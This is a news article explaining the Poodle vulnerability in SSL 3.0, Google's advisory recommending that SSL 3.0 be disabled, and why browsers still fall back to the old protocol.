If the ominous-sounding Heartbleed and Shellshock were named for the size of the threat they present to Web users, then the researchers who discovered “Poodle” couldn’t have picked a more appropriate moniker. The vulnerability is certainly a concern, but researchers have made clear it’s not nearly as serious as the previous hacks.
Short for “Padding Oracle On Downgraded Legacy Encryption,” Poodle essentially makes it possible for hackers to subvert protections on SSL, which secures data transmitted from a website to a visitor. An SSL certificate, for instance, confirms for customers that a website like Amazon is actually Amazon, not a falsified site hoping to steal their credit card information.
The Poodle bug was first revealed in an advisory report from Google’s security team published Tuesday. The experts explained that the bug affects only SSL 3.0, which they called “an obsolete and insecure protocol,” and recommended that Web developers disable SSL 3.0 immediately to “completely avoid” any risk Poodle presents.
While SSL 3.0 was widely replaced 15 years ago, the researchers noted that users who browse the Internet with Microsoft Internet Explorer 6 could still be at risk. A number of servers still support SSL 3.0 for fear of locking users out, though Google has further rendered less-secure versions of SSL obsolete by enacting encryption steps.
“The problem with the obvious solution is that our aging Internet infrastructure is still loaded with crappy browsers, and servers that can’t function without SSLv3 support,” cryptographer and research professor at Johns Hopkins University wrote on his security blog. “Browser vendors don’t want their customers to hit a blank wall anytime they access a server or load balancer that only supports SSLv3, so they enable fallback.”